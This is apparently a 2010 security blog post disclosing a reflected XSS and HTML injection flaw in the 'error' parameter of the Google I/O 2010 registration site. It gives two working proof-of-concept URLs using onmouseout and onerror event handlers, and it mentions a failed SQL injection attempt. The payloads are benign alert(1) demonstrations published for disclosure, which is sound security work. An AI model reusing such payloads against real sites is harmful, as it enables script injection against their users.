miércoles, 23 de junio de 2010

:::SPAS3C-WV-003:::Google IO XSS/HTML Injection Vulnerability



This post is about a bug discovered in Google IO (XSS/HTML Injection)

Risk: Medium

"Google I/O brings together thousands of developers for two days of deep technical content, focused on building the next generation of web, mobile, and enterprise applications with Google and open web technologies such as Android, Google Chrome, Google APIs, Google Web Toolkit, App Engine, and more."

Source: here

Get var "error" was vulnerable to XSS/HTML code injection but some tags and javascript events were filtered trying to do more difficult the explotation.
Also i noticed that viewing source code, error var triggered a SQL error, so I tried to make a SQL Injection but no worked.

Proof of concept:

Indirect. Needed user interaction (event JavaScript: onmouseout) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout=%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E


Fig.1: XSS (Indirect) and HTML Injection.

Direct. Not needed user interaction (event JavaScript: onerror) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert%281%29%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING%3C/a%3E%3C/h1%3E


Fig.2: XSS (Direct) and HTML Injection.

Be safe ;)

2 comentarios:

María José López dijo...

Great!!Thanks for getting everything to work a little better

Be safe :)

José A. Vázquez dijo...

Thanks! I do what i can